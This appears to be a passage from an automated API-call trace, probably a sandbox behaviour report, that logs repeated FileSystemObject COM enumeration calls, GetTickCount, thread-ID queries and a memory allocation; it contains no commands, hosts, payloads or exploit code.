	[0046.886] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.887] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ecf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.887] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.887] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e730, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.891] GetTickCount () returned 0x1144fc6
	[0046.892] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.892] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0046.892] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.892] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.894] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.894] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.894] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0046.894] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.894] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.896] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.897] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ece8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.900] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.901] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42eec8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.901] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.901] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e730, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.904] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.904] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0046.904] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.904] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.904] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.905] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.905] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0046.905] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.905] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.924] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.925] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ece8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.926] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.927] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ece8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.927] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.927] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e730, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.928] GetTickCount () returned 0x1144ff5
	[0046.932] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.933] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0046.933] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.933] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.934] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.935] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.935] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0046.935] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.935] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.937] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.938] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ecf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.939] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.940] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ecf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.940] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.941] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e730, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.947] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.947] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0046.947] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.947] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.949] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.949] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.949] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0046.949] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.949] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.952] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.952] GetTickCount () returned 0x1145004
	[0046.953] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ecf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.955] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.956] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ecf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.956] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.956] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e730, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.962] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.962] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0046.962] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.962] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.964] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.964] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.964] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0046.964] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.964] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.967] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.968] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ece8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.969] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.970] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec48, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.970] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.970] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e730, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.975] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.975] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0046.975] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.975] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.977] GetCurrentThreadId () returned 0x9a8
	[0046.977] GetCurrentThreadId () returned 0x9a8
	[0046.977] ??2@YAPEAX_K@Z () returned 0x42eb60
	[0046.977] malloc (_Size=0x80) returned 0x3c8790
	[0046.980] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca370, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bba8 | out: ppvObject=0x26bba8*=0x0) returned 0x80004002
	[0046.980] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca370, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be10 | out: ppvObject=0x26be10*=0x3ca370) returned 0x0
	[0046.980] FileSystemObject:IUnknown:Release (This=0x3ca370) returned 0x1
	[0046.980] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca370, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.980] FileSystemObject:IUnknown:Release (This=0x3ca370) returned 0x0
	[0046.981] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca370, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bba8 | out: ppvObject=0x26bba8*=0x0) returned 0x80004002
	[0046.981] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca370, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be10 | out: ppvObject=0x26be10*=0x3ca370) returned 0x0
	[0046.981] FileSystemObject:IUnknown:Release (This=0x3ca370) returned 0x1
	[0046.981] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca370, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.982] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca370, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ecc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.982] FileSystemObject:IUnknown:Release (This=0x3ca370) returned 0x0
	[0046.982] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.982] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.983] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.983] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0046.983] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.983] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.985] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ecc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.986] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ede8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.987] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ecc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.988] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ede8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.990] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ecc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.990] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ed48, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.991] GetTickCount () returned 0x1145033
	[0046.991] GetTickCount () returned 0x1145033
	[0046.991] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ecc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.992] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ed48, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.993] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ecc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.994] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ed48, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.995] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ecc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
